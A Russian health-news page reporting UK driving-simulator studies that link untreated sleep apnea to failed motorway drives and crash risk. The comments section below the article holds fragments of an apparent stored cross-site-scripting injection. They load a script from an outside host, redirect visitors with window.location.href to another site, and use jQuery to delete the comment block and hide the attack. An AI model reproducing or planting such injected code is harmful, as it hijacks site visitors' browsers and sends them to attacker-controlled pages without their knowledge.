Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Храпящие люди в 3 раза ча...  >>  Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать
 
Обратная связь
 

Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать

Размер шрифта
31 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что люди, страдающие синдромом ночного апноэ, имеют больший риск попасть в ДТП.

Результаты исследования были представлены общественности в апреле 2013 года на конференции «Сон и дыхание» в Берлине, организованной Европейским Обществом Дыхания и Европейским Обществом Исследования Сна.

Ночное апноэ и раньше связывали с высоким риском попадания в ДТП. Группа ученых из Великобритании провела два независимых исследования в Университете Лидса, изучая, как люди, страдающие ночным апноэ, справляются с автосимулятором.  

Сон за рулем

В первом исследовании принимали участие 133 никогда не лечившихся больных ночным апноэ и 89 здоровых человек. Они проделали путь в 90 километров по автомагистрали на автосимуляторе. Вождение оценивалось по следующим параметрам: способность полностью преодолеть дистанцию, время, количество инцидентов, вождение строго в пределах дороги.

С заданием не справились 24% больных ночным апноэ и 12% здоровых людей. Многие участники с ночным апноэ не могли выполнить задание до конца, имели множество дорожных инцидентов, а также не следовали инструкциям, данным в начале задания.

Во втором исследовании 118 больных апноэ и 69 здоровых участников заполнили анкеты о своем поведении на дороге и также проделали дистанцию 90 километров на автосимуляторе. 35% страдающих заболеванием признали, что иногда бывают рассеянными и сонными за рулем, 38% провалили тест. Для сравнения, 11% здоровых людей отметили дремоту во время вождения, и все из них справились с заданием.

Что говорят ученые

Ведущий исследователь доктор Марк Эллиот комментирует выводы следующим образом: «Автосимулятор – это прекрасный способ выяснить влияние такого заболевания, как ночное апноэ, на вождение. По результатам наших экспериментов больные люди чаще не справляются с заданием.

В первом исследовании некоторые здоровые люди также провалили тест, но причины в обоих случаях разные. Так, 13 больных ночным апноэ заснули за рулем и свернули с автострады, а 5 из них провели более 5% времени за пределами средней полосы, в которой они были проинструктированы оставаться. Из группы здоровых людей никто не провалил тест по этим причинам».

Дэн Смит, представитель Европейского Общества Ночного Апноэ, утверждает: «Опасность оставления ночного апноэ без лечения очевидна в обоих исследованиях. Наши результаты доказывают, что необходимо обеспечить врачей ресурсами для ранней диагностики и лечения ночного апноэ. Эффективное лечение снизит риск для участников дорожного движения».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:15

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?   Как правильно спать   Всемирная неделя первичного иммунодефицита начинается в Москве!   Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
В какой позе спать, чтобы проснуться?
Как спать с бронхитом
Ждете ребенка? Приготовьте дом

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.